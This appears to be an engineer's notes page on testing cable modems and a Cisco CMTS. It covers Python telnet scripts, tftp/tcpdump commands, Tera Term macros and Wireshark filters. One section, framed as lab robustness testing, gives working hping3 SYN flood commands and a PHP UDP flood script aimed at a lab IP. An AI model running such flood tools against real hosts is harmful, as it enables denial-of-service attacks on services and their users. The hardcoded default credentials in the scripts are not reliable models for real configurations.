python telnet to cmts to get ipv6

This is a script to telnet to CMTS-Cisco server to get ipv6 address

The different between python2 and python3 is the byte and str

PYTHON3 we need to use tn.read_until(b"Username:")
PYTHON2 we don't need byte tn.read_until("Username:")

since we need to used byte, so we have to convert to str using decode
we can use decode utf-8 or big5, depend on our OS. If you used CHINESE you have to used BIG5, else ping will not show correct.

Manual Test: 
1.Login to CMTS/Cisco Server
2. used the command to see your ipv6 addres: scm XXX.XXX.XXXX ipv6


1)Method 1 python3 just telnet and get the ipv6 of specfic mac

import getpass
import re
import telnetlib
HOST = "192.168.1.252"
#user = input("Enter your remote account: ")
#password = getpass.getpass()
user='guest'
password='guest'
tn = telnetlib.Telnet(HOST)

tn.read_until(b"Username:")
tn.write(user.encode('ascii') + b"\n")
if password:
    tn.read_until(b"Password:")
    tn.write(password.encode('ascii') + b"\n")

value = tn.read_until(b"Router#")
tn.write(b"scm mac = "AAAA.BBBB.CCCC" ipv6 \n")
value = tn.read_until(b"Router#")
#######################################################
value=value.decode('utf8')
info = "2001"
matchObj = re.match(r'.*'+ info + '(.*)\n',value, re.M|re.DOTALL)
#matchObj=matchObj.decode('big5')

       
if matchObj:
    Ipv6_address = info + matchObj.group(1)
    Ipv6 = Ipv6_address.replace("\n", "")
    print(Ipv6)
    #return Ipv6

else:
    print ("No match!!")  
  

####################################################
        
tn.write(b"exit\n")
#print(tn.read_all().decode('ascii'))

2)Method 2 using function and check telnet reachable or not(python3)

# -*- coding: utf-8 -*-
import telnetlib
import subprocess
import time
import re

def Telnet_Check_reachability(ip):
    ping_count=3
    process = subprocess.Popen(['ping', ip, '-n', str(ping_count)],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
                      
    process.wait()
    stdout = process.stdout.read()
    stdout=stdout.decode("big5")
    #print stdout
    if "TTL=" in stdout:
        #print "Server reachable"
        successful = 1
    else:
        #print "Server unreachable"
        successful = 0
    return successful

def Login_Telnet(HOST,username,password):
    try:
        tn=""
        reachability=Telnet_Check_reachability(HOST)
        if (reachability==1):
            tn = telnetlib.Telnet(HOST,23)
            tn.read_until(b"Username:")
            #tn.write(username + "\n")
            tn.write(username.encode('ascii') + b"\n")
            if password:
                tn.read_until(b"Password:")
                #tn.write(password + "\n")
                tn.write(password.encode('ascii') + b"\n")
            time.sleep(3)
            return tn
    except IOError:
        print ("Telnet " + HOST + " failed. Please check the server connection")

def telnet_To_CMTS(Client_IP, Client_Name, Client_Pwd, MAC):
    tn =Login_Telnet(Client_IP, Client_Name, Client_Pwd)
    if "telnetlib" in str(tn):
        time.sleep(1)
        value = tn.read_until(b"Router#")
        command = "scm " + MAC + " ipv6\n"
        tn.write(command.encode('ascii') + b"\n")
        #tn.write(command)
        
        value = tn.read_until(b"Router#")
        #print value
        tn.close()
        time.sleep(1)

        info = "2001"
       
        #value=str(value)
        value=value.decode('utf8')
        
        matchObj = re.match(r'.*'+ info + '(.*)\n',value, re.M|re.DOTALL)
       
        if matchObj:
            Ipv6_address = info + matchObj.group(1)
            Ipv6 = Ipv6_address.replace("\n", "")
            return Ipv6
        else:
           print ("No match!!")    
        
    else:
        print ("Telnet failed")
ip ="192.168.1.252"
username = "guest"
password = "guest"
mac = "AAAA.BBBB.CCCC"
new_IPv6 = telnet_To_CMTS(ip, username, password, mac)
print (new_IPv6)

3)Method 3 same as method2 using python2

# -*- coding: utf-8 -*-
import telnetlib
import subprocess
import time
import re

def Telnet_Check_reachability(ip):
    ping_count=3
    process = subprocess.Popen(['ping', ip, '-n', str(ping_count)],
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT)
                      
    process.wait()
    stdout = process.stdout.read()
    #print stdout
    if "TTL=" in stdout:
        #print "Server reachable"
        successful = 1
    else:
        #print "Server unreachable"
        successful = 0
    return successful

def Login_Telnet(HOST,username,password):
    try:
        tn=""
        reachability=Telnet_Check_reachability(HOST)
        if (reachability==1):
            tn = telnetlib.Telnet(HOST,23)
            tn.read_until("Username:")
            tn.write(username + "\n")
            if password:
                tn.read_until("Password:")
                tn.write(password + "\n")
            time.sleep(3)
            return tn
    except IOError:
        print "Telnet " + HOST + " failed. Please check the server connection"

def telnet_To_CMTS(Client_IP, Client_Name, Client_Pwd, MAC):
    tn =Login_Telnet(Client_IP, Client_Name, Client_Pwd)
    if "telnetlib" in str(tn):
        time.sleep(1)
        value = tn.read_until("Router#")
        command = "scm " + MAC + " ipv6\n"
        tn.write(command)
        value = tn.read_until("Router#")
        #print value
        tn.close()
        time.sleep(1)

        info = "2001"

        matchObj = re.match(r'.*'+ info + '(.*)\n',value, re.M|re.DOTALL)
        if matchObj:
            Ipv6_address = info + matchObj.group(1)
            Ipv6 = Ipv6_address.replace("\n", "")
            return Ipv6

        else:
           print "No match!!"    
    else:
        print "Telnet failed"


ip ="192.168.1.252"
username = "guest"
password = "guest"
mac = "AAAA.BBBB.CCCC"
new_IPv6 = telnet_To_CMTS(ip, username, password, mac)
print new_IPv6

Unicode and decode python

Python2 uses str, but in python3 it uses byte.

1. str can be encoded into bytes using the encode() method.
2. bytes can be decoded to str using the decode() method.

Reference 

https://medium.com/better-programming/strings-unicode-and-bytes-in-python-3-everything-you-always-wanted-to-know-27dc02ff2686

you can use type(var) to see what type is it. 

Bash append file to date and time format

Some people would like to export or append your file or log name after the date and time format, like this YYMMDD_MMHHSS.

i have a script it is able to append in this style

@ECHO OFF
set datetime=%date:~0,4%-%date:~8,2%-%date:~0,2%_%time:~0,2%%time:~3,2%%time:~6,2%
set datetime=%datetime: =0%
echo hello >>%datetime%.txt
EXIT

It will output like this "2020-17-20_104919.txt"

if you don't want the second just modify like this

set datetime=%date:~0,4%-%date:~8,2%-%date:~0,2%_%time:~0,2%%time:~3,2%%time:~4,0%

Resource: 

https://stackoverflow.com/questions/1192476/format-date-and-time-in-a-windows-batch-script

ddos and security

DDOS Related attack command

command:
1. run attac, and run bulk call should not have problem

hping2  wan0 -2 0i u2 -I eth1

hping2  mta0 -2 0i u2 -I eth1

2. while running attack =, on CPE browser WEB will cause kernel panic
hping3 -V -c 10000 -d 300 -S -p 80 -w 1500 --flood 10.15.3.4 (dummy0.3)
CPE1(lan)-------
CM-------
CMTS-----------CPE2(linux/ubuntu)
CPE1: open browser (youtube channel)
CPE2: used linux to run hping

Script to attach:

<?php 

$host = '10.200.114.18';

$pps = 5000; 

$tune = 125; 

$sock = socket_create( AF_INET, SOCK_DGRAM, SOL_UDP ); 

$uslp = (1000000 / $pps) - $tune; 

if( $uslp < 0 )

$uslp = 0; 

for( $i = 6500000; $i > 0; $i-- )

{ $port = rand( 1025, 65535 ); socket_sendto( $sock, 'LUT2', 4, 0, $host, $port ); usleep( $uslp ); }

?>

IP Passthrough

How to test IP PASS Through

TEST STEP:

With MAC address

1)      Let modem to get online

2)      Connect CPE to CM on lan side

3)      Access GUI from Lan side, and add cpe mac address from ip passthrough

4)      CPE will get the same domain as erouter0

5)      Ping to cpe from CMTS or back of cmts

CPE1----------CM--------------CMTS------------CPE2

Cpe1 will get a public ip (same domain as erouter0)

CPE2 should be able to ping to CPE1

bsod

check BSOD on CMTS

#show cable l2-vpn xconnect dot1q-vc-map

Set VLAN on your config

tcpdump and tftp command

1. Window TFTP Command
tftp -i [IP ADD] [PUT|GET][ FILE NAME]
-g:     get file
 -r:     remote
 -p:     put file
  -l:     local

tftp -i 192.168.1.55 PUT test.txt

2. TFTP Linux
Example: 

tftp [-g|-p]  -r FILENAME SERVERIP

Download: 

tftp -g -r tcpdump 192.168.1.50

Upload

example: tftp -p -r test.txt 192.168.1.50

3. TCPdump and tftp Command, doing packet capture under ROUTER 
You can do this on linux PC also 

Capture all packet:

#cd /var/tmp

#tcpdump -nni any

Capture wan0 interface 

tcpdump -i wan0 -s 0 -w wan0.pcap&

stop capture packet, kill process id

#ps |grep .pcap

#kill -s tcpdum 'pid'

upload to your pc by tftp command

tftp -l wan0.pcap -p 192.168.1.50

Macro-Script

How to used Macro Script(Terateam) to do studd like console:

Example 1 using telnet method to login cisco server or router: 
File name: telnet_cisco.ttl

timeout = 10

connect '192.168.1.252:23 /nossh /T=1'




;Wait a prompt message to login

wait 'Username:'

; Send username

sendln 'cisco'




;Wait for a keyword to enter password

wait 'Password:'

; Send password

sendln 'cisco'

File name: cisco.bat

@echo off

cd C:\Program Files (x86)\teraterm

TTERMPRO /m=D:\Macro_script\telnet_cisco.ttl

pause

How to used it:
Just run the cisco.bat, it will automatic telnet  for you.

Example 2: using serial comport to login your console 
File name: comport.ttl

pause 5

;sendin command

sendln "pacm "

pause 2

;closett will close the screen

closett

File name: comport.bat

@echo off

cd C:\Program Files (x86)\teraterm

TTERMPRO /C=3 /BAUD=115200 /c=3 /m=D:\comport.ttl

pause

How to used it:
Just run the comport.bat, it will automatic accees using terateam to open com-port3 to your DUT console. If  you have different com-port just changed the c=3 to correct com-port. My console port is 3, so I set to 3.

wireshark Filter

Find IPV4 MAC address for DHCP

bootp.hw.mac_addr ==XX:XX:XX:XX:XX:XX

Find IPV6 MAC address for DHCP

dhcpv6.duidll.link_layer_addr == “XX:XX:XX:XX:XX:XX”

Find DNS Qeuery:

dns.qry.name == “XXX.XX.com”

Filter specific IP address overnight or many days. 

If you used above method, your PC might hang. Basely above capture all the packet and just filter. But this is not the best way if you want to capture many hours.  

In order to solve this problem, you have to just capture you wanted packet, it will not capture other packet. 

capture>options>capture filter>type your target to filter(ex: host xxx.xxx.xxx.xxx && udp port=XX)